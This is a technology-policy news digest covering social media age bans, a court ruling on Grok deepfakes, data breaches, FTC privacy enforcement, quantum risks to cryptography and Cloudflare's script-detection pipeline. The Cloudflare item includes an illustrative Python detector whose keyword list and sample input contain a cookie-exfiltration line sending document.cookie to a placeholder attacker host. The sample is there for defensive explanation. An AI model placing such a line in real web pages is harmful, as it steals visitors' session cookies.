France moves toward social media restrictions for children under 15

Legislative efforts in France signal a shift toward stricter governance of youth access to digital platforms, with policymakers preparing to debate a ban on social media use for children under 15.

The proposal forms part of a broader strategy to address concerns over online harms and excessive screen exposure among adolescents.

The draft law in France extends beyond access restrictions, proposing a digital curfew for older teenagers and expanding existing school phone bans to include high schools.

These measures reflect increasing reliance on regulatory intervention instead of voluntary platform safeguards, as evidence links prolonged digital engagement with risks such as cyberbullying, disrupted sleep patterns and exposure to harmful content.

Political backing for the initiative has emerged from figures aligned with Emmanuel Macron, reinforcing the government’s position that stronger oversight of digital environments is necessary. The proposal also mirrors developments in Australia, where similar restrictions have already entered into force.

The debate is further influenced by legal actions targeting major platforms, including TikTok and Meta, amid allegations that algorithmic systems contribute to harmful user experiences.

The outcome of the parliamentary discussions in France is expected to shape future approaches to child safety, platform accountability and digital rights governance across Europe.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Dutch court bans harmful Grok AI-generated images

A judge in Amsterdam has ordered AI chatbot Grok and platform X to stop generating and distributing explicit deepfake images. The ruling targets so-called ‘undressing’ content and illegal material involving minors.

The case was brought by Offlimits, which argued that safeguards were failing. The court found sufficient evidence that harmful images could still be created despite existing restrictions.

The court imposed a penalty of €100,000 per day for violations, with a maximum of €10 million. Access to Grok on X must also be suspended if the system does not comply with the order.

The decision highlights growing legal pressure on AI platforms to control the misuse of generative tools. Regulators and courts are increasingly demanding stronger protections against online abuse and illegal content.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

California challenges federal approach with new AI rules

The government of California is advancing a more interventionist approach to AI governance, signalling a divergence from federal deregulatory preferences.

An executive order signed by Gavin Newsom mandates the development of comprehensive AI policies within four months, prioritising public safety and protecting fundamental rights.

The proposed framework requires companies seeking state contracts to demonstrate safeguards against harmful outputs, including the prevention of child exploitation material and violent content.

It also calls for measures addressing algorithmic bias and unlawful discrimination, alongside increased transparency through mechanisms such as watermarking AI-generated media.

Federal guidance has discouraged state-level intervention, framing such efforts as obstacles to technological leadership.

The evolving policy landscape reflects growing concern over the societal impact of AI systems, including risks to employment, content integrity and civil liberties.

The initiative may therefore serve as a testing ground for future regulatory models, shaping broader debates on balancing innovation with accountability in digital governance.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Healthcare data breach raises concerns over cloud security

A cybersecurity incident involving CareCloud has exposed vulnerabilities in the protection of sensitive medical information, following unauthorised access to patient records stored within its systems.

The breach was detected on 16 March, after attackers had been able to access electronic health records for several hours, raising concerns about potential data exposure.

The company has stated that the intrusion was contained on the same day, with systems restored and an external investigation launched.

However, uncertainty remains about whether any data were extracted and the scale of the potential impact, particularly given the company’s role in supporting tens of thousands of healthcare providers and millions of patients.

Such an incident reflects broader structural risks within digital healthcare infrastructures, where centralised storage of highly sensitive data increases the potential impact of cyberattacks.

Cloud environments, including services provided by Amazon Web Services, are increasingly integral to such systems, amplifying both efficiency and exposure.

The breach follows a pattern of escalating cyber threats targeting healthcare data, driven by its high value in criminal markets.

As investigations continue, the case underscores the need for stronger data protection measures, enhanced monitoring systems and more robust regulatory oversight to safeguard patient information.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Australia reviews compliance with under-16 social media age ban

Australia’s eSafety Commissioner has released an update on rules requiring platforms to prevent users under 16 from holding accounts. Early results show significant action by companies, but also ongoing challenges in fully enforcing the restrictions.

By mid-December 2025, around 4.7 million accounts were removed or restricted, with more than 300,000 additional accounts blocked by March 2026. Despite these reductions, many children continue to retain accounts, create new ones, or pass age assurance checks.

Regulators identified several compliance concerns, including platforms that allow repeated age-verification attempts and prompt some users to update their stated age. Reporting systems for underage accounts were often difficult to access, particularly for parents.

Investigations into five major platforms are ongoing to determine whether they have taken reasonable steps to meet their legal obligations. Authorities are assessing systems and processes rather than individual accounts, with enforcement decisions expected by mid-2026.

A new legislative rule introduced in March 2026 targets platform features linked to potential harm, such as recommender systems and continuous content feeds. Regulators will continue working with industry while gathering evidence and maintaining transparency during the enforcement process.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

EU boosts fact-checking with €5 million disinformation resilience plan

The European Commission has committed €5 million to strengthen independent fact-checking networks, reinforcing efforts to counter disinformation across Europe. The initiative seeks to expand verification capacity in all EU languages while improving coordination among key stakeholders.

The programme introduces a comprehensive support system for fact-checkers, covering legal assistance, cybersecurity protection and psychological support.

It also establishes a centralised European repository of verified information, designed to enhance transparency and improve access to reliable content across the EU.

Led by the European Fact-Checking Standards Network, the project builds on existing frameworks such as the European Digital Media Observatory. The initiative forms part of the EU’s broader strategy to strengthen information integrity and safeguard democratic processes.

By reinforcing independent verification ecosystems, the programme reflects a policy-driven effort to address disinformation threats while supporting a more resilient and trustworthy digital environment across Europe.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

FTC accuses OkCupid of sharing user data contrary to privacy promises

The US Federal Trade Commission has taken action against OkCupid and Match Group Americas over allegations that the dating app shared users’ personal information, including photos and location data, with an unrelated third party, despite privacy promises that such sharing would not occur without notice or an opportunity to opt out.

According to the FTC’s complaint, OkCupid gave the third party access to personal data from millions of users even though the recipient was not a service provider, business partner, or affiliate within the company’s corporate family. The agency says consumers were not informed and were not given a chance to opt out.

The complaint says the third party sought large OkCupid datasets because OkCupid’s founders were financial investors in that company, despite there being no business relationship with the app. The FTC alleges that OkCupid provided access to nearly 3 million user photos, along with location and other information, without formal or contractual limits on how the data could be used.

Christopher Mufarrige, Director of the FTC’s Bureau of Consumer Protection, said: ‘The FTC enforces the privacy promises that companies make. We will investigate, and where appropriate, take action against companies that promise to safeguard your data but fail to follow through—even if that means we have to enforce our Civil Investigative Demands in court.’

The FTC also alleges that, since September 2014, Match and OkCupid have taken extensive steps to conceal and deny that the apps shared users’ personal information with the data recipient, including conduct the agency says obstructed its investigation. One example cited in the complaint is that, after a news report revealed the third party had obtained large OkCupid datasets, the company told the media and users that it was not involved with that third party.

Under the proposed settlement, OkCupid and Match would be permanently prohibited from misrepresenting how they collect, maintain, use, disclose, delete, or protect personal information, including photos, demographic data, and geolocation data. Restrictions would also cover how they describe the purposes of data collection and disclosure, as well as how they present privacy controls and consumer choices under state privacy laws.

The Commission vote authorising staff to file the complaint and stipulating the final order was 2-0. The FTC filed both in the US District Court for the Northern District of Texas, Dallas Division. The agency notes that a complaint reflects its view that it has ‘reason to believe’ the law has been or is about to be violated, while stipulated final orders carry the force of law only if approved and signed by the district court judge.

Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!

New quantum threat could weaken cryptocurrency encryption systems

Google has warned that advances in quantum computing could weaken widely used cryptographic systems protecting cryptocurrencies and digital infrastructure. A new whitepaper suggests future quantum machines may need fewer resources than previously estimated to break elliptic curve cryptography.

The research focuses on the elliptic curve discrete logarithm problem, which underpins much of today’s blockchain security. Findings suggest quantum algorithms like Shor’s could run with fewer qubits and gates, increasing concerns about cryptographic resilience.
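The hardness assumption at stake here can be illustrated on a toy example. The sketch below uses the classic textbook curve y² = x³ + x + 6 over GF(11), where the discrete logarithm (recovering the secret multiplier k from the points G and Q = k·G) is trivially brute-forced; on the roughly 256-bit curves used by real blockchains this search is classically infeasible, and that is exactly what Shor's algorithm would change. The curve parameters and the "key" values are illustrative only:

```python
# Toy elliptic curve discrete logarithm problem (ECDLP):
# curve y^2 = x^3 + x + 6 over GF(11), a standard textbook example.
P, A = 11, 1  # field prime and curve coefficient a

def ec_add(p1, p2):
    """Add two curve points; None represents the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None  # opposite points sum to infinity
    if p1 == p2:  # tangent slope for point doubling
        s = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:         # chord slope for point addition
        s = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (s * s - x1 - x2) % P
    return (x3, (s * (x1 - x3) - y1) % P)

def scalar_mul(k, point):
    """Compute k*point by double-and-add."""
    acc = None
    while k:
        if k & 1:
            acc = ec_add(acc, point)
        point = ec_add(point, point)
        k >>= 1
    return acc

G = (2, 7)                   # generator; the group has prime order 13
secret_k = 9                 # the "private key"
Q = scalar_mul(secret_k, G)  # the "public key"

# Brute-force search: feasible on this toy curve, infeasible at
# cryptographic sizes without a large-scale quantum computer.
recovered = next(k for k in range(1, 13) if scalar_mul(k, G) == Q)
print(recovered)  # 9
```

The security of wallet signatures rests on the gap between how cheap `scalar_mul` is in one direction and how expensive the search in the other direction becomes as the field grows.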

To address the risk, the paper recommends a transition to post-quantum cryptography, which is designed to resist quantum attacks. It also outlines short-term blockchain measures, including avoiding reuse of vulnerable wallet addresses and preparing digital asset migration strategies.

Google also introduced a responsible disclosure approach using zero-knowledge proofs to communicate vulnerabilities without exposing exploitable details.

The company says this balances transparency and security, supporting coordinated efforts across crypto and research communities to prepare for quantum threats.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Cloudflare adds LLM layer to client-side security detection pipeline

Cloudflare has announced two changes to its client-side security offering, making Client-Side Security Advanced available to self-serve customers and offering domain-based threat intelligence at no extra cost to all users on the free Client-Side Security bundle. The update is focused on browser-based attacks that can steal data via malicious scripts without visibly disrupting a website’s normal operation.

Cloudflare says its client-side security system assesses 3.5 billion scripts per day and monitors an average of 2,200 scripts per enterprise zone. According to the company, the product relies on browser reporting, including Content Security Policy signals, rather than scanners or application instrumentation, and requires only that traffic be proxied through Cloudflare.
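The browser-reporting approach mentioned above can be illustrated with a report-only Content Security Policy header, which asks browsers to report, without blocking, any script loaded from an origin not on the allow list. The CDN origin and report endpoint below are hypothetical placeholders, not Cloudflare's actual configuration:

```http
Content-Security-Policy-Report-Only: script-src 'self' https://cdn.example.com; report-uri /csp-violation-endpoint
```

Because the reports come from the visitor's own browser, this style of monitoring sees the scripts as they actually execute on the client, with no scanner or application instrumentation required.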

A central part of the announcement is a new detection pipeline combining a Graph Neural Network (GNN) with a Large Language Model (LLM). Cloudflare says the GNN analyses the Abstract Syntax Tree of JavaScript code to identify malicious intent even when scripts are minified or obfuscated. Scripts flagged as suspicious are then passed to an open-source LLM running on Workers AI for a second-stage semantic assessment intended to reduce false positives.
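Cloudflare has not published its models, but the two-stage pattern it describes, a cheap high-recall first pass followed by a more expensive precision filter, can be sketched generically. The keyword rules below are hypothetical stand-ins for the GNN and LLM stages, chosen only to show the control flow:

```python
# Minimal sketch of a two-stage detection pipeline: stage one casts a broad
# net (high recall), stage two runs only on stage-one hits to cut false
# positives. Both stages here are toy stand-ins, not Cloudflare's models.

SUSPICIOUS_TOKENS = ("eval", "atob", "document.cookie", "fromCharCode")

def stage_one(script: str) -> bool:
    """Cheap structural check: flag anything that looks risky."""
    return any(tok in script for tok in SUSPICIOUS_TOKENS)

def stage_two(script: str) -> bool:
    """Slower 'semantic' check, run only on stage-one hits.
    Toy rule: exfiltration needs both cookie access and a network send."""
    return "document.cookie" in script and (
        "fetch(" in script or "sendBeacon" in script
    )

def classify(scripts):
    flagged = [s for s in scripts if stage_one(s)]    # broad net
    confirmed = [s for s in flagged if stage_two(s)]  # precision filter
    return flagged, confirmed

scripts = [
    "navigator.sendBeacon('//evil.example', document.cookie)",  # exfiltration
    "const img = atob(data); render(img)",                      # benign decode
    "console.log('hello')",                                     # clearly benign
]
flagged, confirmed = classify(scripts)
print(len(flagged), len(confirmed))  # 2 1
```

The benign `atob` call is flagged by stage one but discarded by stage two, which is the false-positive reduction role the LLM plays in Cloudflare's described pipeline.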

Cloudflare says the GNN is tuned for high recall to identify novel and zero-day threats, but that false alarms remain a challenge at internet scale. Internal evaluation results cited by the company show that the secondary LLM layer cut false positives in the JS Integrity threat category roughly threefold across total analysed traffic, from about 0.3% to about 0.1%. On unique scripts, Cloudflare says the false-positive rate fell from about 1.39% to 0.007%.

The company also describes a recent case involving a heavily obfuscated malicious script named core.js. According to Cloudflare, the payload targeted Xiaomi OpenWrt-based home routers, altered DNS settings, and attempted to change admin passwords. Cloudflare says the script was injected through compromised browser extensions rather than by directly compromising a website, and adds that its GNN detected the malicious structure while the LLM confirmed the intent.

Cloudflare argues that the two-stage design provides structural detection via the GNN and broader semantic filtering via the LLM, enabling the company to lower the GNN decision threshold without sharply increasing alert volume. Every script flagged by the GNN is also logged to Cloudflare R2 for later auditing, which the company says helps it review cases where the LLM overrode the initial verdict.

Domain-based threat intelligence is now being made available to all Client-Side Security customers, including those not using the Advanced tier. Cloudflare says the move is partly a response to attacks seen in 2025 against smaller online shops, especially on Magento, where client-side compromises continued for days or weeks after public disclosure. By extending domain-based signals more broadly, the company says site owners can more quickly identify malicious JavaScript or suspicious connections and investigate possible compromises.

Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!

Technology reshapes pensions engagement

New technology is reshaping how people engage with pensions, according to Financial Conduct Authority chief executive Nikhil Rathi. Speaking in London, he highlighted the growing role of AI and digital tools in helping savers better understand their retirement finances.

Pensions dashboards are expected to give millions a clearer view of their savings, potentially driving greater engagement and behavioural change. Increased visibility may encourage actions such as consolidating pension pots or adjusting contributions.

Officials warn that stronger engagement brings risks as well as opportunities, with many consumers still lacking clear retirement plans. Policymakers aim to balance protection with flexibility, promoting informed decisions while avoiding overly restrictive systems.

Advances in AI are also enabling more personalised financial guidance, making it easier for users to explore retirement scenarios. Experts say the future of pensions will depend on integrating savings, housing and wider financial planning into a more connected system.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!